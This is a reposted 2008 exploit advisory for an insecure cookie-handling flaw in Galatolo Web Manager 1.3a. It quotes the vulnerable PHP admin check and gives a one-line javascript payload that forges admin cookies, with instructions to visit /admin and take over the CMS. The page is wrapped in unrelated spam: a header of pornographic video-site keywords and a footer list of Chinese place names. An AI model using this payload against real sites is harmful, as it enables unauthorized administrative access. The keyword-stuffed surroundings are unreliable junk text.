最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

互聯(lián)網(wǎng)   發(fā)布時間:2008-10-08 21:03:28   作者:佚名   我要評論
############################################################################################ # # # ...:::::Galatolo Web Manager 1.3a Insecure Cook
############################################################################################
# #
# ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... #
############################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
top();
menu();
echo $wellcome_admin;
foot();
}

---
exploit:
javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
-----
now visit /admin and you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz

相關(guān)文章

最新評論

米易县| 从江县| 区。| 山西省| 师宗县| 东明县| 裕民县| 驻马店市| 梅州市| 彩票| 射阳县| 泰顺县| 祥云县| 石景山区| 登封市| 西畴县| 宜兰县| 花莲市| 阿鲁科尔沁旗| 公主岭市| 张家港市| 昌乐县| 聊城市| 长岭县| 木兰县| 西青区| 吴堡县| 丹棱县| 七台河市| 永顺县| 平潭县| 临清市| 怀安县| 康定县| 金坛市| 西安市| 封丘县| 天津市| 万宁市| 桃园县| 枞阳县|